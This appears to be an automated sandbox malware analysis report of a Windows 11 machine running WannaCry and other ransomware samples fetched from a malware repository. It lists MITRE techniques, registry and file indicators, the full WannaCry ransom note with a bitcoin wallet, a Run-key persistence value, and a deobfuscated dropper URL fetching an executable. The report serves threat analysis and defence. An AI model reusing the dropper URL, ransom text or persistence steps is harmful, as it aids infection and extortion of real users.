wannacry | hxxps://github[.]com/ytisf/theZoo/tree/master/malware/Binaries

Analysis

max time kernel
627s
max time network
629s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06-09-2024 07:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ytisf/theZoo/tree/master/malware/Binaries

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 1 IoCs

flow	pid	Process
124	5104	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5104	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8F5B.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8F62.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 7 IoCs

pid	Process
5776	taskdl.exe
972	@[email protected]
4920	@[email protected]
5224	taskhsvc.exe
5944	taskdl.exe
4184	taskse.exe
5680	@[email protected]

Loads dropped DLL 6 IoCs

pid	Process
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5340	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nktegbozss876 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\""	reg.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
40	raw.githubusercontent.com
3	raw.githubusercontent.com
15	raw.githubusercontent.com
39	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1380 set thread context of 124	1380	683a09da219918258c58a7f61f7dc4161a3a7a377cf82a31b840baabfb9a4a96.exe	127

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\assembly	svchost.exe
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
5344	5156	WerFault.exe	114
2460	2004	WerFault.exe	120
104	124	WerFault.exe	127
6008	4920	WerFault.exe	155
196	4920	WerFault.exe	155

System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	683a09da219918258c58a7f61f7dc4161a3a7a377cf82a31b840baabfb9a4a96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Vcffipzmnipbxzdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	683a09da219918258c58a7f61f7dc4161a3a7a377cf82a31b840baabfb9a4a96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Vcffipzmnipbxzdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133700825656967375"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5796	reg.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Petya.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA	svchost.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\CryptoLocker_20Nov2013.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Satana.zip:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1356	chrome.exe
1356	chrome.exe
2460	chrome.exe
2460	chrome.exe
2460	chrome.exe
2460	chrome.exe
5104	powershell.exe
5104	powershell.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe
5224	taskhsvc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe
Token: SeShutdownPrivilege	1356	chrome.exe
Token: SeCreatePagefilePrivilege	1356	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
3556	firefox.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe
1356	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3556	firefox.exe
972	@[email protected]
972	@[email protected]
4920	@[email protected]
4920	@[email protected]
5680	@[email protected]
5680	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1356 wrote to memory of 1776	1356	chrome.exe	80
PID 1356 wrote to memory of 1776	1356	chrome.exe	80
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 1132	1356	chrome.exe	82
PID 1356 wrote to memory of 2176	1356	chrome.exe	83
PID 1356 wrote to memory of 2176	1356	chrome.exe	83
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84
PID 1356 wrote to memory of 1096	1356	chrome.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5524	attrib.exe
2076	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/ytisf/theZoo/tree/master/malware/Binaries
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc406ecc40,0x7ffc406ecc4c,0x7ffc406ecc58
  2⤵
  PID:1776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1808 /prefetch:2
  2⤵
  PID:1132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:1096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3080 /prefetch:1
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4552,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4768,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4532 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4456,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4932 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4340,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:3568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4488,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3152 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4860,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4068,i,927207970636374763,2640222079513996702,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5020 /prefetch:8
  2⤵
  - NTFS ADS
  PID:6036
- C:\Program Files\Google\Chrome\Application\chrome.exe
